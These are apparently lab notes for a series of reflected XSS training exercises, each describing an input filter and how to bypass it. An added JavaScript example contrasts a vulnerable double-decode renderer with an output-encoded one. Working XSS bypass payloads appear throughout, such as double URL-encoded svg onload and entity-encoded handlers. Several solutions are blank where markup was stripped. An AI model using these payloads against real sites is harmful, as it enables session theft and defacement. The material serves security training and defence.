00: Supposed to be safe
01: This has no filters at all
10: Basic HTMLi XSS. Anything goes here, there is no protection
11: Here we introduced a filter to stop script and alert Solution: Solution:
12: Here we added confirm to our filter Solution: Solution:
13: Here we put your input to lowercase before sanitising it, making no longer a valid bypass Solution:
14: > seems to be stripped but we can still think of attacks without > Solution:
16.php: < is still blocked but this time we are URL-decoding your input. Not just one time but twice! This means you will have to double-encode your URL values:
Solution:
%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E
%2522%253E%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E
17: Parentheses are blocked BUT we can use the HTML entities Solution1: Solution2:
18: Only iframes are allowed here
20: Your code is reflected between the HTML comments so you need to end them: --> Then you can enter your text: -->-->
21: In the same context, we now block script and alert Then you can enter your text: -->-->
22: We now also block confirm Then you can enter your text: -->-->
23: Before, you could escape the filters by using uppercase characters; that is no longer possible. Then you can enter your text: -->-->
24: We are removing any > (greater than signs) Then you can enter your text: --> Then you can enter your text: -->
28: Spaces are removed --> We replace a space with "/"
30: HTML tag attribute XSS. We can see a new input tag appearing on the page upon submitting a value. We can break out with Solution: '>
31: alert and script are filtered Solution: '>
32: alert and script and confirm are filtered Solution: '>
33: Before, you could escape the filters by using uppercase characters; that is no longer possible. Solution: '>
34: > is filtered out '>
36: We now remove both < and > so you have to replace them with < and >
40: JS XSS. We can see a new script appearing on the page upon submitting a value. This does a document.write(''). We can break out with Solution: ');alert();//
50: You need to disguise your XSS attack to LOOK like an email address, for example ">"@x.y
80: Only tags work here but you need to combine it with scrolling. You have to make the page scroll using a lot of
tags and then use to complete the scrolling. Enter the following in the to field:
...
90: Because I use backticks in my JS code, you can use template literals:
https://labs.hackxpert.com/RXSS/GET/90.php?test=1%3C/Script/%3E%3CImg/Src/OnError=_=confirm,_(1)%3E
100: This lab will transform any input you give it into uppercase characters, which might make it seem impossible, but JS is a funky language. We can use HTML entities, for example, to bypass this:
https://labs.hackxpert.com/RXSS/GET/100.php?q=1%3C!--%3E%3CK%2FAutoFocus%2FContentEditable%2FOnFocusIn=%26%2397%26%23108%26%23101%26%23114%26%23116%26%2396%26%2375%26%2396%3E
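Added example, not part of the original lab notes or the lab's own source: a constructed JavaScript model of the lab 16 flow (block <, then URL-decode twice) next to a version that encodes at the output sink. The function names and the <p>Result: ...</p> template are assumptions; the payload is the one listed under lab 16.

```javascript
// Added example: constructed model of the lab 16 flow. The lab's PHP source is
// not on the page, so the function names and the <p> template are assumptions.

// Payload copied from the lab 16 notes (double URL-encoded).
const LAB16_PAYLOAD = "%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E";

// The notes say the input is URL-decoded twice.
function decodeTwice(value) {
  return decodeURIComponent(decodeURIComponent(value));
}

// Weak pattern: denylist check on the still-encoded text, decode afterwards,
// then concatenate into HTML. The check never sees the "<" decoding produces.
function vulnerableRender(queryValue) {
  if (queryValue.includes("<")) return null; // treated as "blocked"
  return "<p>Result: " + decodeTwice(queryValue) + "</p>";
}

const HTML_ENTITIES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

// Encode for element content and quoted attribute values (labs 10-36 contexts).
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Corrected pattern: same decoding, but the final value is encoded at the
// sink, so the number of decode passes no longer matters.
function hardenedRender(queryValue) {
  let text;
  try {
    text = decodeTwice(queryValue);
  } catch (err) {
    return null; // malformed percent-sequence: reject instead of guessing
  }
  return "<p>Result: " + escapeHtml(text) + "</p>";
}

console.log(vulnerableRender(LAB16_PAYLOAD)); // markup survives the filter
console.log(hardenedRender(LAB16_PAYLOAD));   // rendered as inert text
```

The same encoder neutralises the '> attribute breakout from the 30-series labs when the attribute value is quoted; it is not sufficient for the lab 40 JavaScript-string context, which needs its own encoding.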